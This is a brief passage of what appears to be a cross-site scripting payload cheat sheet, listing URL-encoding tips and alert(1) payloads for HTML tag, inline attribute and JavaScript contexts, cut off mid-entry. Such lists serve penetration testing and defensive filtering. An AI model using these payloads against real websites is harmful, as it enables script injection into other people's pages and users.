本文有一个重点需要GET到。
Technique
Vector/Payload *
* In URLs:
& => %26 , # => %23 , + => %2B
HTML Context
Tag Injection
<svg onload=alert(1)>
"><svg onload=alert(1)//
HTML Context
Inline Injection
"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//
Javascript Context
Code Injection
'-alert(1)-'
'-...